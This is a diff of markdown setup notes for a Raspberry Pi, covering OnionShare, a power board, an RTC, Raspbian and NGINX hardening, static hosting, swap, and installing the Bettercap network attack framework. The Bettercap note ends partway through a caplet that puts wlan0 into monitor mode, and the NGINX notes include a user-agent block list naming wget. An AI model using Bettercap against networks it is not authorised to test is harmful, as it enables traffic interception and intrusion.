The onionshare service will stop as the SSH connection is closed or command is stopped. To prevent that use a terminal multiplexer like `screen`
```bash
sudo apt install -y screen
# run it
screen
```
At the bottom of the screen is a new bar with `0 bash` highlighted. This means we are in a screen session.
Now running onionshare and exiting the SSH session should not end the onionshare service.
After logging in again reconnect to the session with `screen -x`
# Sources and more
[https://github.com/onionshare/onionshare](https://github.com/onionshare/onionshare)

57
power hat.md Normal file
View File

@ -0,0 +1,57 @@
I do not get anything for writing this, i just got myself that type of power board. Feel free to look around, perhaps there are even better ones fitting your project.
# X735 Expansion Board
![](Assets/X735.jpg)
The X735 is a expansion board for all models (1-4) of the Raspberry Pi using a 40-pin header. It provides power management, safe shutdown, full poweroff through software and an automatic temperature controlled fan. The X735 also reserves the 40-pin header that can be stacked with other Raspberry Pi accessory boards.
At the same time, the X735 reserve two kind of 4PIN power switch (momentary and latching) port, you can connect the additional power switch to safe control the power on/power off;
## Important
- Full power off via software is not supported when using a external latching switch
- "L-SW" Jumper on X735 should be removed when using onboard switch / momentary switch
- "Auto On" Jumper on X735 should be removed when using external switch
- Both "L-SW" & "Auto On" Jumper caps should be removed when using momentary switch
- Do not power the Raspberry Pi via the Raspberry Pi's Micro-USB socket
## Features
Momentary button
- Press the momentary button or external momentary power switch to turn on
- Press the momentary button or external momentary power switch and hold for 1~2seconds to reboot
- Press the momentary button or external momentary power switch and hold for 3~7seconds to implement safe shutdown
- Press the momentary button or external momentary power switch and hold for more than 8 seconds to force shutdown
- Supports safe shutdown and full poweroff through software
Auto cooling function
- Board temperature ≤34C - Fan running at low speed
- Board temperature ≥34C - Fan running at medium speed
- Board temperature ≥45C - Fan running at full speed
- On-board LEDs show the status of fan running low and high
Supports four kinds of power supply:
- **DC5525**: Can provide up to 4A power supply capability.
- **Type C**: specially designed for Raspberry Pi 4 Model B
- **Micro USB**: Compatible with your original mirco usb power adapter
- **XH2.54 2Pin**: This is a flexible power supply
# Safe shutdown script
Tested on Raspbian Stretch 2018
```bash
# Download run script
wget https://raw.githubusercontent.com/geekworm-com/x730-script/master/x730.sh
# Setting file attributes
sudo chmod +x x730.sh
# Install the script
sudo bash x730.sh
# Setting up the command to turn off X730 from software
printf "%s\\n" "alias x730off='sudo x730shutdown.sh'" >> ~/.bashrc
# Reboot the Raspberry Pi
sudo reboot
# Powering off the Raspberry Pi from software
x730off
```
# Source
all information (and maybe updates) can be found at [Geekworm](https://wiki.geekworm.com/X735)

57
rtc.md Executable file
View File

@ -0,0 +1,57 @@
# Real Time Clock
It is practical to have a real time clock (RTC) built into your system. With this you are more flexible and have less problems with connections and scanning of devices.
# automatic sync ntp
To automatic sync with an ntp server use
```bash
sudo timedatectl set-time "2020-04-23 8:38"
# or
timedatectl set-ntp True
```
# DS1307 RTC
- 5V DC supply
- Automatic Power-Fail detect and switch circuitry
- Consumes less than 500nA in Battery-Backup Mode with Oscillator Running
- 56-Byte, Battery-Backed, Nonvolatile (NV)RAM for data storage
- I2C ADDRESS 0x68
Pinout
| PIN | Description | Comment |
| --- | ------------------- | ------------------------------------------------ |
| BAT | Battery voltage | To monitor the battery voltage, or not connected |
| GND | Ground | Ground |
| VCC | 5V supply | Power the module and charge the battery |
| SDA | I2C data | I2C data for the RTC |
| SCL | I2C clock | I2C clock for the RTC |
| DS | Temp. Sensor output | One wire inteface |
| SQ | Square wave output | Normally not used |
## Setting up
```bash
nano /boot/config.txt
# add: dtoverlay=i2c-rtc,ds1307
reboot
i2cdetect -y 1
# You should see a wall of text appear, if UU appears instead of 68 then we have successfully loaded i2c in the Kernel driver
# Remove fake system clock
sudo apt -y remove fake-hwclock
sudo update-rc.d -f fake-hwclock remove
sudo nano /lib/udev/hwclock-set
# Find and Comment out
> if [ -e /run/systemd/system ] ; then
> exit 0
> fi
# read the time directly
sudo hwclock -D -r
# read the system time
date
```
If the time displayed by the date command is correct, you can go ahead and run the following command on your RPi. This command will write the time from the RPi to the RTC Module.
```bash
sudo hwclock -w
# and verify
sudo hwclock -r
```

273
secure raspbian.md Normal file
View File

@ -0,0 +1,273 @@
# Security
For your own safety it is recommended to do the following steps. This will improve your systems security and make it more and more difficult for hackers to intrude.
## Change your password
The standard password "raspberry" is known to everybody. Change it with
```bash
passwd
```
and enter your new password
## Update your RPi (frequently)
Every time in a while you should update your RPi for newest security patches.
```bash
sudo apt update
sudo apt full-upgrade
sudo apt install rpi-eeprom raspberrypi-kernel-headers
sudo apt autoremove
```
If the bootloader didn't have the OTG availability you can now add the lines of code mentioned in [OTG](OTG.md) and restart.
### automate updates
You can use the package `unattended-upgrades` to run updates in a frequent base without having to do it all by your own
1. Install the package `sudo apt install unattended-upgrades`
2. Open the config file `sudo nano /etc/apt/apt.conf.d/50unattended-upgrades`
3. Change the file at your needs. I recommend to uncomment `Unattended-Upgrade::Mail "root";` to send an email at updates and errors (if you configured a mail server)
4. Edit the periodic upgrades by editing `sudo nano /etc/apt/apt.conf.d/02periodic`. Insert the following lines, this runs updates every day
``bash
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "1";
APT::Periodic::Unattended-Upgrade "1";
APT::Periodic::AutocleanInterval "1";
APT::Periodic::Verbose "2";
```
5. to show the configuration and debug error you can run `sudo unattended-upgrades -d`
## Change the standard user
Create a new user `sudo adduser <username>` and grant sudo-Rights `sudo adduser <username> sudo`. After that copy all files and rights owned by the `pi` user to your new user:
```bash
sudo cp -r /home/pi/ /home/<username>/
sudo usermod -a -G adm,dialout,cdrom,sudo,audio,video,plugdev,games,users,input,netdev,gpio,i2c,spi <username>
```
Check if your new user is available and can handle everything, log into your new user via SSH `<username>@raspberrypi.local` and after that, delete the old `pi` user:
```bash
sudo pkill -u pi #kills all processes by pi
sudo deluser -remove-home pi
```
If you are unsure with deletion, you can also just deactivate the account:
```bash
usermod -L pi
passwd -l pi
```
With that the user `pi` is can no longer log into his account.
## Create and use SSH keys
To be (at our time) absolutely save against password/brute-force attacks you can use SSH keys. Those are used to identify one computer to another.
On your RPi delete the pre-generated SSH keys and create new ones at your hand:
```bash
# delete keys from standard user
rm -rf /home/pi/.ssh
# delete keys from all other users
rm -rf /home/<username>/.ssh
# delete hostname keys; standard hostname is raspberry
ssh-keygen -R <hostname>
# create new keys; choose your own config if you want
ssh-keygen -t ecdsa -b 521
```
Now to authenticate your computer to the RPi we start at your computer
1. create your SSH Keypair on your Computer: `ssh-keygen -t ecdsa -b 521`
2. Copy the generated public key to your RPi: `cp ~/.ssh/id_ecdsa.pub <username>@raspberrypi.local:/home/<username>/publicKey.pub`
3. add the public key to your RPi-Keychain: `cat /home/<username>/publickey.pub >> ~/.ssh/authorized_keys`
4. reconnect to your RPi again. Now you shouldn't be asked a password as the SSH key was used to identify
Alternatifly, if ssh-copy-id is available you can just `ssh-copy-id <USERNAME>@<IP-ADDRESS>` to copy and register your SSH Key to your RPi.
After SSH-key-exchange you can now log into your RPi without the need of a password. You can now (optional) disable the password based login. To do that change the ssh configuration file `sudo nano /etc/ssh/sshd_config`
```bash[/etc/ssh/sshd_config]
ChallengeResponseAuthentication no
PasswordAuthentication no
UsePAM no
```
Save and restart
## SSH: disable root login
As access with root privileges is a great thread you can disable it. Without root access you can log in as your normal user and then use `sudo` to gain root priviledges. By default the root access is disabled, check that:
- open the SSH config file `sudo nano /etc/ssh/sshd_config`
- search the following line `#PermitRootLogin prohibit-password`
- prepend a `#` if not exist already
- save and restart SSH `sudo service ssh restart`
It's also possible to block certain users from using SSH. Therefore use the lines `AllowUsers <username>` and `DenyUsers <username>` in the `/etc/ssh/sshd_config` file
## SSH: change the port
SSH uses the default port 22. Most bots and hackers will try to penetrate that port at first. You can change the port to make it more difficult to hack you.
- Edit the config file `sudo nano /etc/ssh/sshd_config`
- search the line `#Port 22`
- exchange the set number by your port number, e.g. `Port 1111` (also remove the `#`)
- make sure the port is not used by other services, heres a list: [List of port numbers](https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers)
- save and restart SSH `sudo service ssh restart`
To access your RPi with your custom port use the '-p' option:
```bash
ssh <username>@<ipadress> -p 1111
```
Don't forget to update your firewall rules (if installed) and check the connection before closing it to prevent errors.
## Remove unused network services
Nearly all OS have network services preinstalled and activated. Most of them are useful and you want to keep them. But there may also be some you want to remove. List all running network-services with `sudo ss -atpu`.
As example it could look like that:
```bash
tcp LISTEN 0 128 *:http *:* users:(("nginx",pid=22563,fd=7))
tcp LISTEN 0 128 *:ssh *:* benutzer:(("sshd",pid=685,fd=3))
```
To completely remove a service use `sudo apt purge <service-name>`
## Stop unnecessary services
Save power and close security holes by stopping all services you don't need.
First of all you can get a list of all services, with runlevel and showing if they are running or not:
```bash
systemctl list-unit-files --type=service
systemctl list-dependencies graphical.target
```
Unwanted services can be disabled
```bash
systemctl disable <service-name>
systemctl disable httpd.<service-name>
```
and late be started/restarted or stopped
```bash
systemctl start <service-name>
systemctl restart <service-name>
systemctl stop <service-name>
```
You can also remove services from the system, that will make up some space:
- if a service starts at boot: `sudo update-rc.d <service-name> remove`
- to uninstall a service use: `sudo apt remove <service-name>`
Be aware not to stop system-relevant services as your raspberry may stop working then (just reboot in most cases after that happens).
## Repent brute force with Fail2ban
Hackers will try to access your system more than one time. Fail2ban can recognise and block those brute force attacks. Fail2ban blocks IP adresses that couldn't log in successful for a couple of times. It is configurable to set the amount of tries and duration of block.
1. install the package `sudo apt install fail2ban`
2. configure fail2ban wih `sudo nano /etc/fail2ban/jail.local` and edit following
```bash
[ssh]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 6
```
3. restart fail2ban to update with configuration `sudo service fail2ban restart`
The configuration above will limit logins to 5 tries every 10 minutes, a total of 720 tries per day.
## install a firewall
Firewalls can block all ports you don't use, restrict access to specific IPs and more. For example you can only allow SSH access from your very own IP address.
There are different approaches and packages to build your firewall.
To show all open ports and programms accessing them use `netstat -tulpn`, `ss -tulpn` or
```bash
nmap -sT -O localhost
nmap -sT -O server.example.com
```
### Uncomplicated Firewall
1. install the package
```bash
sudo apt install ufw
```
2. allow access to everybody for HTTP und HTTPS
```bash
sudo ufw allow http #Port 80
sudo ufw allow https #Port 443
```
3. allow SSH access only to your IP address (edit to your configuration)
```bash
sudo ufw allow from <IpAdresse> port 22
```
4. activate the firewall (now and at every boot)
```bash
sudo ufw enable
```
5. check your configuration
```bash
sudo ufw status verbose
```
### iptables
Iptables are a bit more complex but allow more specific rulesets.
1. install the package. Choose "Yes" for `rule.v4` and optional `rule.v6` for IPv6 support
2. edit the rules for IPv4
```bash
sudo nano /etc/iptables/rules.v4
```
3. the configuration should be emtpy. Add or edit the following lines
```bash
*Filter.
:INPUT ACCEPT [5897:7430402]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [1767:169364]
COMMIT
```
Add your own iptables before `COMMIT` and save. E.g. you could add
```bash
sudo iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j REJECT
```
This rule filters ICMP traffic of type 8 and sends "Destination port unreachable"
4. Test your firewall with ping. If it answers as expected you can restart now
5. after restart the ping should show "Destination port unreachable"
6. to show your iptables configuration: `iptables -L` which should show something like
```bash
Chain INPUT (policy ACCEPT)
target prot opt source destination
REJECT icmp anywhere anywhere icmp echo-request reject-with icmp-port-unreachable
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
```
## Encrypt your connections
With basic unencrypted protocols, the data on the network flows in plain text. That means if you type in your password, a hacker could get it easily while listening to the network. But there are often other protocols that work more securely by encrypting all data.
The first thing you should do is stop using insecure protocols (e.g. FTP, Telnet or HTTP) and then try to replace them with more secure accesses (SFTP, SSH, HTTPS).
## Use a VPN
VPN stands for Virtual Private Network and allows you to remotely access all services on your RPi as if you were on the local network.
All data flows between you and the RPi are encrypted using a strong protocol.
This is a good option to prevent many ports from being opened on the Internet without security.
As example you could use [OpenVPN](https://openvpn.net/)
## Protect physical access
Obvious, but often ignored. You can configure all the security protocols, firewall and VPN from all the previous steps but if your RPi is physically accessible to everyone, it is useless.
Make sure it (or the SD card) can't be easily stolen or that no one could come in and plug in a keyboard and screen and be logged in automatically.
The steps to implement to protect against this type of attack will depend on your system. Maybe you need an automatic logout after X minutes, a password in the grub boot menu, or encryption of the data on the SD card.
## Check your logs regularly
More a commitment to follow. Most of the time, attacks are visible in log files, so try to read them regularly to detect suspicious activity.
All logs are located in the `/var/log` folder, the most important log files to check are:
- `/var/log/syslog`: main log file for all services
- `/var/log/message`: log file for the whole system
- `/var/log/auth.log`: all authentication attempts are logged here
- `/var/log/mail.log`: if you have a mail server, a record of the last emails sent can be found here
- Any critical application log file, for example `/var/log/apache2/error.log` or `/var/log/mysql/error.log`.
You can also use logwatch to get daily reports about the system operation

229
secure server.md Normal file
View File

@ -0,0 +1,229 @@
# Secure NGINX server
After installing und setting up the NGINX server it should be secured. Here are the most popular steps. Implement all or only those you want.
## Default Config Files and Nginx Port
- `/usr/local/nginx/conf/` or `/etc/nginx/` - The nginx server configuration directory
- `/usr/local/nginx/conf/nginx.conf` is main configuration file
- `/usr/local/nginx/html/` or `/var/www/html` - The default document location
- `/usr/local/nginx/logs/` or `/var/log/nginx` - The default log file location
- Nginx HTTP default port : TCP 80
- Nginx HTTPS default port : TCP 443
Test NGINX configuration changes by
```bash
/usr/local/nginx/sbin/nginx -t
# or
nginx -t
```
To load config changes, type `/usr/local/nginx/sbin/nginx -s reload` oder `nginx -s reload`
## Linux hardening
Configure the kernel and network settings at `/etc/sysctl.conf`
```bash
# Avoid a smurf attack
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Turn on protection for bad icmp error messages
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Turn on syncookies for SYN flood attack protection
net.ipv4.tcp_syncookies = 1
# Turn on and log spoofed, source routed, and redirect packets
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martians = 1
# No source routed packets here
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Turn on reverse path filtering
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# Make sure no one can alter the routing tables
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
# Don't act as a router
net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Turn on execshild
kernel.exec-shield = 1
kernel.randomize_va_space = 1
# Tune IPv6
net.ipv6.conf.default.router_solicitations = 0
net.ipv6.conf.default.accept_ra_rtr_pref = 0
net.ipv6.conf.default.accept_ra_pinfo = 0
net.ipv6.conf.default.accept_ra_defrtr = 0
net.ipv6.conf.default.autoconf = 0
net.ipv6.conf.default.dad_transmits = 0
net.ipv6.conf.default.max_addresses = 1
# Optimization for port usefor LBs
# Increase system file descriptor limit
fs.file-max = 65535
# Allow for more PIDs (to reduce rollover problems); may break some programs 32768
kernel.pid_max = 65536
# Increase system IP port limits
net.ipv4.ip_local_port_range = 2000 65000
# Increase TCP max buffer size setable using setsockopt()
net.ipv4.tcp_rmem = 4096 87380 8388608
net.ipv4.tcp_wmem = 4096 87380 8388608
# Increase Linux auto tuning TCP buffer limits
# min, default, and max number of bytes to use
# set max to at least 4MB, or higher if you use very high BDP paths
# Tcp Windows etc
net.core.rmem_max = 8388608
net.core.wmem_max = 8388608
net.core.netdev_max_backlog = 5000
net.ipv4.tcp_window_scaling = 1
```
## remove all unnecassery NGINX-modules
Reduce the number of modules, that compile into the NGINX binary file. This will minimise the risks, as the allowed functions are reduced. For example deactive the SSI and autoindex module:
```bash
./configure --without-http_autoindex_module --without-http_ssi_module
make
make install
```
Use the following command to list all activated and deactivated modules:
```bash
./configure --help | less
```
This only works if you configured and installed NGINX from source.
## limit available methods
GET and POST are the most common methods on the Internet. Web server methods are defined in RFC 2616. If a web server does not require the implementation of all available methods, they should be disabled. The following will filter and only allow GET, HEAD and POST methods. Add it to the website configuration.
```bash
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD|POST)$ ) {
return 444;
}
## Do not accept DELETE, SEARCH and other methods ##
```
More About HTTP Methods
- The GET method is used to request document
- The HEAD method is identical to GET except that the server MUST NOT return a message-body
- The POST method may involve anything, like storing or updating data, or ordering a product
## deny certain User-Agents
Add following to the website configuration.
Easily block user-agents i.e. scanners, bots and spammers who may abuse the server.
```bash
## Block download agents
if ($http_user_agent ~* LWP::Simple|BBBike|wget) {
return 403;
}
##
```
Block robots called msnbot and scrapbot:
```bash
## Block some robots
if ($http_user_agent ~* msnbot|scrapbot) {
return 403;
}
```
## block referral Spam
Referer spam is dangerouns. It can harm the SEO ranking via web-logs (if published) as referer field refer to their spammy site. Block access to referer spammers with these lines (in your config file)
```bash
## Deny certain Referers ###
if ( $http_referer ~* (babes|forsale|girl|jewelry|love|nudit|organic|poker|porn|sex|teen) )
{
# return 404;
return 403;
}
##
```
## stop image hotlinking
Image or HTML hotlinking means someone creates a link to an images on one webpage but displays it on their own site. It will make content look like their own and pollute the bandwidth. This is often done on forums and blogs. Change it in your configuration
```bash
# Stop deep linking or hot linking
location /images/ {
valid_referers none blocked www.example.com example.com;
if ($invalid_referer) {
return 403;
}
}
```
Another example with link to a banned image
```bash
valid_referers blocked www.example.com example.com;
if ($invalid_referer) {
rewrite ^/images/uploads.*\.(gif|jpg|jpeg|png)$ http://www.examples.com/banned.jpg last
}
```
# directory restrictions
Set access control for a specified directory. All web directories should be configured on a case-by-case basis, allowing access only where needed.
E.g. Limiting Access By Ip Address to /docs/ directory:
```bash
location /docs/ {
## block one workstation
deny 192.168.1.1;
## allow anyone in 192.168.1.0/24
allow 192.168.1.0/24;
## drop rest of the world
deny all;
}
```
To password protect the directory first create the password file and add a user
```bash
mkdir /usr/local/nginx/conf/.htpasswd/
htpasswd -c /usr/local/nginx/conf/.htpasswd/passwd <username>
```
Edit `nginx.conf` and protect the required directories as follows
```bash
# password protect /personal-images/ and /delta/ directories
location ~ /(personal-images/.*|delta/.*) {
auth_basic "Restricted";
auth_basic_user_file /usr/local/nginx/conf/.htpasswd/passwd;
}
```
Once a password file has been generated, subsequent users can be added with the following command:
```bash
htpasswd -s /usr/local/nginx/conf/.htpasswd/passwd <username>
```
## Limit connections per IP at firewall level
A webserver must keep an eye on connections and limit connections per second. This is serving 101. Iptables can throttle end users before accessing a NGINX server.
The following example will drop incoming connections if an IP make more than 15 connection attempts to port 80 within 60 seconds:
```bash
/sbin/iptables -A INPUT -p tcp --dport 80 -i eth0 -m state --state NEW -m recent --set
/sbin/iptables -A INPUT -p tcp --dport 80 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 15 -j DROP
service iptables save
```
# Secure Apache/PHP/Nginx server
Edit `httpd.conf` file and add the following
```bash
ServerTokens Prod
ServerSignature Off
TraceEnable Off
Options all -Indexes
Header always unset X-Powered-By
```
Restart the httpd/apache2 server on Linux
```bash
sudo systemctl restart apache2.service`
# or
sudo systemctl restart httpd.service
```
# Sources and more
https://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html

274
static server.md Normal file
View File

@ -0,0 +1,274 @@
# Static Server with NGINX
NGINX is a very powerful web server. You can do a ton of things with it, such as setting up reverse proxies or load balancing. It can also be used to host your static website.
## Installation
Install the NGINX package
```bash
sudo apt update
sudo apt install nginx
```
Install from source
```bash
sudo apt install build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev -y
wget http://nginx.org/download/nginx-1.21.4.tar.gz
tar -zxvf nginx-1.21.4.tar.gz
sudo rm -r nginx-1.21.4.tar.gz
git clone https://github.com/GetPageSpeed/ngx_security_headers.git
cd nginx-1.21.4
./configure --prefix=/var/www/html \
--sbin-path=/usr/sbin/nginx \
--conf-path=/etc/nginx/nginx.conf \
--http-log-path=/var/log/nginx/access.log \
--error-log-path=/var/log/nginx/error.log \
--with-pcre \
--lock-path=/var/lock/nginx.lock \
--pid-path=/var/run/nginx.pid \
--with-http_ssl_module \
--with-http_image_filter_module=dynamic \
--modules-path=/etc/nginx/modules \
--with-http_v2_module \
--with-stream=dynamic \
--with-http_addition_module \
--with-http_mp4_module \
--add-module=../ngx_security_headers
make
make install
```
## Move your websites static files to the server
By default, NGINX expects your static files to be in a specific directory. You can override this in the configuration. Defaults assume that youll be putting your websites static files in the `/var/www/` directory.
Hint: <mywebsite> consists of the domain name and domain extension, e.g. `example.com`
Create a directory in `/var/www/` names as you like. This is where your static websites files will go.
```bash
sudo mkdir /var/www/<websitename>
```
Copy or create your websites static files into that folder. cd into your websites directory and run:
```bash
# creating files
touch /var/www/<mywebsite>/index.html
sudo nano /var/www/<mywebsite>/index.html
# copy/move files
cp ./index.html /var/www/<mywebsite>/
mv ./index.html /var/www/<mywebsite>/
# safe copy to network destination
scp -r * <username>@<ip>:/var/www/<mywebsite>
```
## Configure NGINX to serve your website
The NGINX configuration files are located at `/etc/nginx/`. We need to tell NGINX about the website and how to serve it.
The two directories we are interested in are sites-available and sites-enabled.
- `sites-available` contains individual configuration files for all possible static websites
- `sites-enabled` contains links to the configuration files that NGINX will actually read and run
To enable a website, we create a configuration file in `sites-available` and create a symbolic link of that file in `sites-enabled` to tell NGINX to run it.
```bash
sudo nano /etc/nginx/sites-available/<mywebsite>
```
Add the following text to it
```bash
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/<mywebsite>;
index index.html;
server_name <mywebsite> www.<mywebsite>;
location / {
try_files $uri $uri/ =404;
}
}
```
This file tells NGINX several things:
- Deliver files from the folder `/var/www/<mywebsite>`
- The main index page is called `index.html`
- Requests that are requesting `<mywebsite>` should be served by this server block
- Note the www is also listed separately. This tells nginx to also route requests starting with www to the site. Theres actually nothing special about the www — its treated like any other subdomain
Now that the file is created, well add it to the sites-enabled folder to tell NGINX to enable it.
```bash
# use like: ln -s <SOURCE_FILE> <DESTINATION_FILE>
ln -s /etc/nginx/sites-available/<mywebsite> /etc/nginx/sites-enabled/<mywebsite>
```
Now restart NGINX and you should see your site at your localhost port
```bash
sudo systemctl restart nginx
```
If it gives you an error, theres likely a syntax error.
## Enable HTTPS
With free SSL certs from LetsEncrypt, you can enable HTTPS for your website. In addition to the improved security, theres significant performance opportunities it allows via HTTP/2, youll increase user confidence and youll even rank higher in SEO.
### Acquire an SSL cert
Theres multiple ways to do this. You can buy a single-domain certification or a wildcard certification if you plan on securing subdomains.
You can also go the free route via LetsEncrypt:
```bash
sudo apt-get install software-properties-common
sudo add-apt-repository ppa:certbot/certbot
sudo apt-get update
sudo apt-get install python-certbot-nginx
sudo certbot --nginx certonly
```
Follow the instructions. This will install certs in `/etc/letsencrypt/live/<mywebsite>/`
To enable auto-renewal for certificates, edit the crontab and create a CRON job to run the renewal command:
```bash
sudo crontab -e
```
And add the following line:
```
17 7 * * * certbot renew --post-hook "systemctl reload nginx"
```
### Tell NGINX to use the SSL cert
Modify the configuration file created before. Add the following text, changing the paths to point to the certificate file and the key file (usually stored in`/etc/nginx/certs/`):
```bash
server {
# ...previous content
ssl on;
ssl_certificate /etc/letsencrypt/live/<mywebsite>/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/<mywebsite>/privkey.pem;
```
A problem now occurs as port 80 was used for HTTP no longer of use as HTTPS uses port 443. Change that in the configuration
```bash
server {
listen 443 default_server;
listen [::]:443 default_server;
#... all other content
}
```
As this will prevent people to access your page over HTTP we need to redirect HTTP requests to HTTPS. Add the following code after the HTTPS server code into your configuration file of the webpage
```bash
server {
listen 0.0.0.0:80;
server_name <mywebsite> www.<mywebsite>;
rewrite ^ https://$host$request_uri? permanent;
}
```
This will redirect all requests to <mywebsite> and www.<mywebsite> on port 80 to the HTTPS URL on port 443.
Restart NGINX to make the changes happen: `sudo systemctl restart nginx`
Test the configuration by going to the four variations of the URL, eg.:
- http://<mywebsite>
- https://<mywebsite>
- http://www.<mywebsite>
- https://www.<mywebsite>
They should all work and be secured via HTTPS.
## Improve performance
### Enable HTTP/2
HTTP/2 allows browsers to request files in parallel, greatly improving the speed of delivery. We need HTTPS enabled. Edit the browser configuration file, adding http2 to the listen directive, then restart NGINX:
```bash
server {
listen 443 http2 default_server;
listen [::]:443 http2 default_server;
#... all other content
}
```
### Enable client-side caching
Some files never change or change rarely, so users can prevent re-download too often. Set the cache control headers to provide hints to browsers to let those know what files they shouldnt request again.
```bash
server {
#...after the location / block
location ~* \.(jpg|jpeg|png|gif|ico)$ {
expires 30d;
}
location ~* \.(css|js)$ {
expires 7d;
}
}
```
Set the times after own experience.
### Dynamically route subdomains
In the case of subdomains, you may not want to route every subdomain to the correct folder. Create a wildcard server to route matching names. Edit your website configuration therefore:
```bash
server {
server_name ~^(www\.)(?<subdomain>.+).<mywebsite>$ ;
root /var/www/<mywebsite>/$subdomain;
}
server {
server_name ~^(?<subdomain>.+).<mywebsite>$ ;
root /var/www/<mywebsite>/$subdomain;
}
```
Restart NGINX and route subdomains automatically to the same-named subfolder.
## remove the Server header
Security through obscurity isnt the holy grail that will make any website secure completely. But as a complementary security measure, it can be used.
NGINX, by default, sends information about its use in the Server HTTP header as well as error pages, e.g.: nginx/1.16.1.
To confirm the currently emitted header, run `curl -IsL https://example.com/ | grep -i server`
### hide version information
The standard security solution is hiding NGINX version information. In the `/etc/nginx/nginx.conf`:
```bash
http {
...
server_tokens off;
...
}
```
This only hides the specific version of NGINX from the Server header and error pages.
The header becomes: `Server: nginx`
### hide server header
#### using ngx_security_headers module
Easiest method is using the package made to extend NGINX:
```bash
sudo apt install nginx-module-security-headers
```
Edit the `nginx.conf` like:
```bash
load_module modules/ngx_http_security_headers_module.so;
http {
...
hide_server_tokens on;
...
}
```
Now the Server header is completely eliminated from the responses.
#### using Headers More module
Another module to use is:
```bash
sudo apt install nginx-module-headers-more
```
Edit the `nginx.conf` like:
```bash
load_module modules/ngx_http_headers_more_filter_module.so;
http {
...
more_clear_headers Server;
...
}
```
Likewise, the Server header will be completely gone from the responses.
### hide the use of NGINX
Hiding the Server header is good but the default error pages by NGINX still output the "nginx" word in them.
An easy way to complete hiding of NGINX presence on the server is using NGINX-MOD.
Simply specify the following in the configuration: `server_tokens none;`
Alternatively hide the NGINX presence by recompiling it from the source (highly discouraged, see common pitfalls). Adjust NGINX sources to prevent the information disclosure of NGINX software.
```bash
sed -i 's@"nginx/"@"-/"@g' src/core/nginx.h
sed -i 's@r->headers_out.server == NULL@0@g' src/http/ngx_http_header_filter_module.c
sed -i 's@r->headers_out.server == NULL@0@g' src/http/v2/ngx_http_v2_filter_module.c
sed -i 's@<hr><center>nginx</center>@@g' src/http/ngx_http_special_response.c
```
Then recompile NGINX.

28
swap.md Normal file
View File

@ -0,0 +1,28 @@
# Set swap memory
Swap memory is a file on computer storage dedicated to help RAM when this is not enough according to programs need. It is a common feaure for all unix like systems.
Current swap size and position can be verified in several ways. Before going on, consider that swap size is usually calculated in MByte. Tools reporting this value in bits will consider that, for memory, 1 Kbyte is equal to 1028 MByte.
The very first way where to get current swap size, is using the command `free`. For a more detailed overview you can use `top` to show all running processes, memory and swap.
Changing swap size requires disabling swap, editing size, enabling swap and restarting swap service again. All of these actions are done with following terminal commands:
- Disable swap: `sudo dphys-swapfile swapoff`
- Change swap size in dphys-swapfile. Open this file for editing: `sudo nano /etc/dphys-swapfile`
- find the `CONF_SWAPSIZE` parameter and change according to your needs. For example `CONF_SWAPSIZE=500`
- Enable swap and restart dphys service:
```bash
sudo dphys-swapfile swapon
sudo systemctl restart dphys-swapfile.service
```
- Check that swap has changed value: `free`
# Set swappiness
Swappiness is a concept complementary to swap memory. It drives when linux kernel should start using swap file instead of RAM.
When linux kernel needs more phisical memory, it can decide to use page cache (also stored on disk) or moving pages to swap memory. Swappiness defines how the kernel will be likely to use swap instead of RAM.
- show current swappiness: `sysctl vm.swappiness`
- change swappiness temporary (between 0 and 100): `sudo sysctl -w vm.swappiness=50`
- to change permanently open `/etc/sysctl.conf` and append `vm.swappiness=10` with the value you desire
# Sources and more
- [peppe8o.com](https://peppe8o.com/set-raspberry-pi-swap-memory/)

83
tools/bettercap.md Normal file
View File

@ -0,0 +1,83 @@
# Bettercap
## Installing GO
As bettercap uses GO we will install this first. Update the number if Go got a newer version available.
```
wget https://go.dev/dl/go1.17.5.linux-armv6l.tar.gz
# extract to /usr/local/go
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.17.5.linux-armv6l.tar.gz
```
We now need to add the PATH environment variable that are required for the system to recongize where the Golang is installed. To do that, edit the `~/.profile` file. Scroll all the way down to the end of the file and add the following:
```bash
PATH=$PATH:/usr/local/go/bin
GOPATH=$HOME/golang
```
Feel free to change the `GOPATH=$HOME/golang` to something else. Finally we need to make the system aware of the new profile, run `source ~/.profile`
Type `which go` to find out where the Golang installed and `go version` to see the installed version and platform.
## Installing Bettercap
Now, with GO installed, we are able to install Bettercap
```bash
sudo apt install libpcap-dev libnetfilter-queue-dev libusb-1.0-0-dev build-essential
go install github.com/bettercap/bettercap@latest
# copy bettercap to use it directly
sudo cp go/bin/bettercap /usr/bin/
# install the caplets and the web ui in /usr/local/share/bettercap and quit
sudo bettercap -eval "caplets.update; ui.update; quit"
```
### Workflow
### Adding Caplets to bettercap
We will save all Caplets in a shared folder: `cd /usr/share/bettercap/captlets`
A simple caplet can look like this:
```bash
# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
set $ {bold}😈 » {reset}
# make sure wlan0 is in monitor mode
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
!monstop
!monstart
# every 5 seconds:
# - clear the screen
# - show the list of nearby access points
